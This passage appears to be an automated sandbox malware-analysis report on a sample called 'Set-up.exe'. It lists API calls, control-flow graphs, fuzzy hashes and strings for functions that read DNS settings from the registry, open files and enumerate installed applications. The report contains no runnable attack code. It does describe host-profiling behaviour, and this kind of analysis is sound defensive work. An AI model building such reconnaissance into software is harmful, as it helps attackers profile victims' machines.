                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assertgetsockname
                          • String ID: ares__sortaddrinfo.c$cur != NULL
                          • API String ID: 1186336949-2430778319
                          • Opcode ID: 1e1b30b3611942dd9b077a37a2a6efb8a2e6252e03aa9ecad764cd2569552fe4
                          • Instruction ID: 5e5247eb8a4d3ac7fc06ab9e02aec382dcfdb6991aca392f75a6f53a560a5b46
                          • Opcode Fuzzy Hash: 1e1b30b3611942dd9b077a37a2a6efb8a2e6252e03aa9ecad764cd2569552fe4
                          • Instruction Fuzzy Hash: 7FC17D316043259FD718DF24D891E6AB7E1FF98314F0488ACE8898B3A6DB35ED45CB81
                          APIs
                          • Sleep.KERNEL32 ref: 00A611B7
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00A61238
                          • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A6124D
                          • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61261
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A612EB
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A61323
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A6132E
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00A61344
                          • GetStartupInfoA.KERNEL32 ref: 00A61433
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                          • String ID:
                          • API String ID: 3873122205-0
                          • Opcode ID: 6fb65a7ef1baded47f561e4203899aa4a5e01418b21a77b1defa154408782ef2
                          • Instruction ID: f91c12986051f2c3e3843c027dd06b7b44a7f60f7cf55df52f75a157d21a23e4
                          • Opcode Fuzzy Hash: 6fb65a7ef1baded47f561e4203899aa4a5e01418b21a77b1defa154408782ef2
                          • Instruction Fuzzy Hash: 0B519DB1A05305CFDB20EF6AE48575ABBF0FB48700F18452CE9859B345DB3AA944DBA1
                          APIs
                          • recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 00B2A90C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: recvfrom
                          • String ID:
                          • API String ID: 846543921-0
                          • Opcode ID: 5a659c526b3b43268a498082a9f941d742c4692ac4a46da811ddc1181c11db2b
                          • Instruction ID: bb9ab091b26684ccb12548ad048bc256cfe352274fe6a75f85a98420479ff188
                          • Opcode Fuzzy Hash: 5a659c526b3b43268a498082a9f941d742c4692ac4a46da811ddc1181c11db2b
                          • Instruction Fuzzy Hash: 8BF01D75108358AFD2209F42EC48D6BBBFDEFC9764F0545ADF95C232119271AE14CA72
                          APIs
                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A499
                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A4FB
                          • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A531
                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B1AA19
                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1AA4C
                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00B1AA97
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00B1AAE9
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00B1AB30
                          • RegCloseKey.KERNELBASE(?), ref: 00B1AB6A
                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00B1AB82
                          • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1ABAD
                          • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1ABF0
                          • RegCloseKey.ADVAPI32(?), ref: 00B1AC2A
                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00B1AC46
                          • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00B1AC71
                          • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 00B1ACB4
                          • RegCloseKey.ADVAPI32(?), ref: 00B1ACEE
                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00B1AD0A
                          • RegEnumKeyExA.KERNELBASE ref: 00B1AD8D
                          • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00B1ADB0
                          • RegCloseKey.KERNELBASE(?), ref: 00B1ADD9
                          • RegEnumKeyExA.KERNELBASE ref: 00B1AE08
                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00B1AE2A
                          • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00B1AE54
                          • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,?), ref: 00B1AEA3
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B1AF18
                          • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00B1AF2C
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00B1AF63
                          • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00B1AFB2
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B1B027
                          • strncat.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?), ref: 00B1B03B
                          • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00B1B072
                          • RegQueryValueExA.ADVAPI32(?,DhcpDomain,00000000,00000000,00000000,?), ref: 00B1B0C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: QueryValue$Open$Close$AdaptersAddressesstrncat$Enumstrlen
                          • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces$[%s]:%u$[%s]:%u%%%u
                          • API String ID: 1856363200-4239849775
                          • Opcode ID: 4b196e0e7f36c05dee651912da841037bfa094c2857cf2fd2a60525d3baec1e4
                          • Instruction ID: f0e1720b28329bea0b86458e6df2012ff4f054bf2fcaece46395cfb6537c6b36
                          • Opcode Fuzzy Hash: 4b196e0e7f36c05dee651912da841037bfa094c2857cf2fd2a60525d3baec1e4
                          • Instruction Fuzzy Hash: D482AE71608301AFE3209F25DC86B9B7BE8EF84740F54486CF989DB291E775E984CB52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 602 b29740-b2975b 603 b29780-b29782 602->603 604 b2975d-b29768 call b278a0 602->604 606 b29914-b2994e memset RegOpenKeyExA 603->606 607 b29788-b297a0 getenv call b278a0 603->607 612 b299bb-b299c0 604->612 613 b2976e-b29770 604->613 609 b29950-b29955 606->609 610 b2995a-b299ab RegQueryValueExA ExpandEnvironmentStringsA RegCloseKey strlen call b278a0 606->610 607->612 618 b297a6-b297c5 _stat64 607->618 615 b29a0c-b29a15 609->615 619 b299b0-b299b5 610->619 612->615 617 b29772-b2977e 613->617 613->618 617->607 620 b29827-b29833 618->620 621 b297c7-b297e0 618->621 619->612 619->618 624 b29835-b2985c call b1e2b0 * 2 620->624 625 b2985f-b29872 call b25ca0 620->625 622 b297e2-b297f3 _time64 621->622 623 b297f6-b29809 _stricmp 621->623 622->623 623->620 628 b2980b-b29810 623->628 624->625 632 b299f0 625->632 633 b29878-b2987d call b277b0 625->633 628->620 629 b29812-b29822 628->629 629->615 637 b299f5-b299fb call b25d00 632->637 639 b29882-b29889 633->639 646 b299fe-b29a09 637->646 639->637 642 b2988f-b2989b call b14fe0 639->642 642->632 649 b298a1-b298c3 _time64 call b278a0 642->649 646->615 653 b299c2-b299ed call b1e2b0 * 2 649->653 654 b298c9-b298db call b1e2d0 649->654 653->632 654->653 659 b298e1-b298f0 call b1e2d0 654->659 659->653 665 b298f6-b29905 call b263f0 659->665 669 b29f66-b29f7f call b25d00 665->669 670 b2990b-b2990f 665->670 669->646 671 b29a3f-b29a5a call b26740 call b263f0 670->671 671->669 678 b29a60-b29a6e call b26d60 671->678 681 b29a70-b29a94 call b26200 call b267e0 call b26320 678->681 682 b29a1f-b29a39 call b26840 call b263f0 678->682 693 b29a16-b29a19 681->693 694 b29a96-b29ac6 call b1d120 681->694 682->669 682->671 693->682 696 b29fc1 693->696 699 b29ae1-b29af7 call b1d190 694->699 700 b29ac8-b29adb call b1d120 694->700 698 b29fc5-b29ffd call b25d00 call b1e2b0 * 2 696->698 698->646 699->682 707 b29afd-b29b09 call b14fe0 699->707 700->682 700->699 707->696 714 b29b0f-b29b29 call b1e730 707->714 718 b29f84-b29f88 714->718 719 b29b2f-b29b3a call b278a0 714->719 722 b29f95-b29f99 718->722 719->718 727 b29b40-b29b54 call b1e760 719->727 723 b29fa0-b29fb6 call b1ebf0 * 2 722->723 724 b29f9b-b29f9e 722->724 735 b29fb7-b29fbe 723->735 724->696 724->723 732 b29f8a-b29f92 727->732 733 b29b5a-b29b6e call b1e730 727->733 732->722 740 b29b70-b2a004 733->740 741 b29b8c-b29b97 call b263f0 733->741 735->696 745 b2a015-b2a01d 740->745 746 b29c9a-b29cab call b1ea00 741->746 747 b29b9d-b29bbf call b26740 call b263f0 741->747 748 b2a024-b2a045 call b1ebf0 * 2 745->748 749 b2a01f-b2a022 745->749 758 b29f31-b29f35 746->758 759 b29cb1-b29ccd call b1ea00 call b1e960 746->759 747->746 766 b29bc5-b29bda call b26d60 747->766 748->698 749->698 749->748 761 b29f40-b29f61 call b1ebf0 * 2 758->761 762 b29f37-b29f3a 758->762 777 b29ccf 759->777 778 b29cfd-b29d0e call b1e960 759->778 761->682 762->682 762->761 766->746 776 b29be0-b29bf4 call b26200 call b267e0 766->776 776->746 797 b29bfa-b29c0b call b26320 776->797 781 b29cd1-b29cec call b1e9f0 call b1e4a0 777->781 787 b29d53-b29d55 778->787 788 b29d10 778->788 798 b29d47-b29d51 781->798 799 b29cee-b29cfb call b1e9d0 781->799 791 b29e69-b29e8e call b1ea40 call b1e440 787->791 792 b29d12-b29d2d call b1e9f0 call b1e4a0 788->792 815 b29e90-b29e92 791->815 816 b29e94-b29eaa call b1e3c0 791->816 819 b29d5a-b29d6f call b1e960 792->819 820 b29d2f-b29d3c call b1e9d0 792->820 808 b29c11-b29c1c call b27b70 797->808 809 b29b75-b29b86 call b1ea00 797->809 804 b29dca-b29ddb call b1e960 798->804 799->778 799->781 825 b29e2e-b29e36 804->825 826 b29ddd-b29ddf 804->826 808->741 830 b29c22-b29c33 call b1e960 808->830 809->741 837 b29f2d 809->837 827 b29eb3-b29ec4 call b1e9c0 815->827 845 b29eb0-b29eb1 816->845 846 b2a04a-b2a04c 816->846 842 b29dc2 819->842 843 b29d71-b29d73 819->843 820->792 840 b29d3e-b29d42 820->840 832 b29e38-b29e3b 825->832 833 b29e3d-b29e5b call b1ebf0 * 2 825->833 835 b29e06-b29e21 call b1e9f0 call b1e4a0 826->835 827->682 848 b29eca-b29ed0 827->848 859 b29c66-b29c75 call b278a0 830->859 860 b29c35 830->860 832->833 847 b29e5e-b29e67 832->847 833->847 872 b29e23-b29e2c call b1eac0 835->872 873 b29de1-b29dee call b1ec80 835->873 837->758 840->791 842->804 853 b29d9a-b29db5 call b1e9f0 call b1e4a0 843->853 845->827 849 b2a057-b2a070 call b1ebf0 * 2 846->849 850 b2a04e-b2a051 846->850 847->791 847->827 856 b29ee5-b29ef2 call b1e9f0 848->856 849->735 850->696 850->849 886 b29db7-b29dc0 call b1eac0 853->886 887 b29d75-b29d82 call b1ec80 853->887 856->682 880 b29ef8-b29f0e call b1e440 856->880 876 b2a011 859->876 877 b29c7b-b29c8f call b1e7c0 859->877 867 b29c37-b29c51 call b1e9f0 _stricmp 860->867 867->741 890 b29c57-b29c64 call b1e9d0 867->890 896 b29df1-b29e04 call b1e960 872->896 873->896 876->745 877->741 899 b29c95-b2a00e 877->899 902 b29ed2-b29edf call b1e9e0 880->902 903 b29f10-b29f26 call b1e3c0 880->903 908 b29d85-b29d98 call b1e960 886->908 887->908 890->859 890->867 896->825 896->835 899->876 902->682 902->856 903->902 915 b29f28 903->915 908->842 908->853 915->696
                          APIs
                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(CARES_HOSTS), ref: 00B2978D
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,?), ref: 00B297BA
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B297E4
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B298A5
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000104), ref: 00B29920
                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B29946
                          • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00B29974
                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 00B29981
                          • RegCloseKey.ADVAPI32(?), ref: 00B2998B
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00B29992
                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00B297FE
                            • Part of subcall function 00B278A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,00000000,00B2E16D,?), ref: 00B278AF
                            • Part of subcall function 00B278A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000), ref: 00B278D9
                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 00B29C46
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _stricmp_time64strlen$CloseEnvironmentExpandOpenQueryStringsValue_stat64getenvmemcpymemset
                          • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                          • API String ID: 3843116398-4129964100
                          • Opcode ID: 742d4b6f66a67731400844c8e1f391567fe48fd76033a074eaf52b194f981d70
                          • Instruction ID: 6dfedd7eb81b6836b27dc91d537bb979fe14e691d21e9e63f131cf8eb4d0aa06
                          • Opcode Fuzzy Hash: 742d4b6f66a67731400844c8e1f391567fe48fd76033a074eaf52b194f981d70
                          • Instruction Fuzzy Hash: E932D3B1904211ABEB11AB24FC82A5B77E4EF54354F0844B8FC4D9A262FB32ED54D793

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: EnumOpen
                          • String ID: %s\%s$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall$app_name$d$index$installed_apps
                          • API String ID: 3231578192-3120786300
                          • Opcode ID: 77216c65cd0f266c4c702932ea9d33ecc8d665dfee1478fba29ef3a5ebfe82c1
                          • Instruction ID: 6bc0020acb1486d2064d1738c0ef2d12003ca4df81aa9f973f21c77cf2a6eb7a
                          • Opcode Fuzzy Hash: 77216c65cd0f266c4c702932ea9d33ecc8d665dfee1478fba29ef3a5ebfe82c1
                          • Instruction Fuzzy Hash: 0471D1B4904309DFDB50DF69D98579EBBF0BF84318F00885DE89897301E7789A899F92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1095 c3e5d0-c3e602 strlen MultiByteToWideChar 1096 c3e6b0-c3e6bb GetLastError 1095->1096 1097 c3e608 1095->1097 1098 c3e6e2-c3e6f2 GetLastError 1096->1098 1099 c3e6bd-c3e6d4 MultiByteToWideChar 1096->1099 1100 c3e60f-c3e643 call de9f40 MultiByteToWideChar 1097->1100 1102 c3e703-c3e70a 1098->1102 1103 c3e6f4-c3e6ff fopen 1098->1103 1099->1098 1101 c3e6d6-c3e6dd 1099->1101 1100->1102 1106 c3e649-c3e66d strlen MultiByteToWideChar 1100->1106 1101->1100 1103->1102 1107 c3e673-c3e683 _wfopen 1106->1107 1108 c3e701 1106->1108 1107->1102 1109 c3e685-c3e68e _errno 1107->1109 1108->1102 1110 c3e6a0-c3e6ae fopen 1109->1110 1111 c3e690-c3e69e _errno 1109->1111 1110->1102 1111->1102 1111->1110
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E5E2
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00C3E5FA
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 00C3E637
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00BCA31E), ref: 00C3E64D
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00BCA31E,00000001,?,00000008,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000), ref: 00C3E665
                          • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E678
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E685
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E690
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BCA31E,?,?,?,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E), ref: 00C3E6A6
                          • GetLastError.KERNEL32(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E6B0
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?), ref: 00C3E6CC
                          • GetLastError.KERNEL32(?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E6E2
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BCA31E,?,00000000,00BE47C4,?,00000000,00000000,00000000,?,00000000,?,00BCA31E,?,00FFAB14), ref: 00C3E6FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                          • String ID:
                          • API String ID: 2867842857-0
                          • Opcode ID: d880813523fe24bddc48ddc55924fff63956a7aa4f208ab822d25667dc3ac3d3
                          • Instruction ID: 5bf1b82ad88c8743d0617db877e2428281df649b96011d59dcc1086f48ae493b
                          • Opcode Fuzzy Hash: d880813523fe24bddc48ddc55924fff63956a7aa4f208ab822d25667dc3ac3d3
                          • Instruction Fuzzy Hash: 8431A171610204BFEB306A72DC4AF6B3769FB45721F148528FA56895C0EA35EE04CBA2

                          Control-flow Graph

                          • Executed
                          • Not Executed
